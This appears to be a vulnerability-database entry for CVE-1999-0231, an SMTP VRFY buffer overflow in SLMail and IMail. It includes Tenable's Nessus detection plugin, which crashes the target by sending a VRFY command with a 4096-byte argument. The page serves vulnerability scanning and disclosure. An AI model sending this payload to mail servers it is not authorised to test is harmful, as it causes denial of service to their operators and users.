Vulnerabilities > CVE-1999-0231 - Unspecified vulnerability in Seattle LAB Software Slmail 2.6

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
seattle-lab-software
nessus
NVD
Published: 1999-01-01
Updated: 2022-08-17

Summary

Buffer overflow in IP-Switch IMail and Seattle Labs Slmail 2.6 packages using a long VRFY command, causing a denial of service and possibly remote access.

Vulnerable Configurations

Part Description Count
Application
Seattle_Lab_Software
1

Nessus

NASL familySMTP problems
NASL idSLMAIL.NASL
descriptionIt was possible to crash the affected SMTP service by sending a VRFY command with a long argument. This attack is known to affect certain versions of Ipswitch IMail and Seattle Labs
last seen2020-06-01
modified2020-06-02
plugin id10254
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10254
titleIpswitch IMail / SLMail VRFY Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
  script_id(10254);
  script_version ("1.34");

  script_cve_id("CVE-1999-0231");

  script_name(english:"Ipswitch IMail / SLMail VRFY Command Remote Overflow");
  script_summary(english:"VRFY aaaaa(...)aaa crashes the remote MTA");

  script_set_attribute(
    attribute:'synopsis',
    value:"The remote mail server is vulnerable to denial of service."
  );

  script_set_attribute(
    attribute:'description',
    value:
"It was possible to crash the affected SMTP service by sending a VRFY
command with a long argument. 

This attack is known to affect certain versions of Ipswitch IMail and
Seattle Labs' SLMail, although products from other vendors may also be
affected. 

An unauthenticated, remote attacker can leverage this issue to conduct
a denial of service attack against the affected mail server."
  );
  script_set_attribute(
    attribute:'solution',
    value:"Contact the product's vendor for an update."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_attribute(
    attribute:'see_also',
    value:"https://seclists.org/bugtraq/1998/Mar/93"
  );
  script_set_attribute(
    attribute:'see_also',
    value:"https://seclists.org/bugtraq/1998/Mar/94"
  );
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/03/12");
 script_cvs_date("Date: 2018/11/15 20:50:24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:ipswitch:imail");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:seattle_lab_software:slmail_pro");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"SMTP problems");

  script_dependencie("find_service1.nasl", "smtpserver_detect.nasl", "sendmail_expn.nasl");
  script_require_ports("Services/smtp", 25);
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
# Note that slmail is also vulnerable on port 27.
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(1);

data = strcat('VRFY ', crap(4096), '\r\n');
send(socket:soc, data:data);
close(soc);

if (service_is_dead(port: port) > 0)
  security_warning(port);

References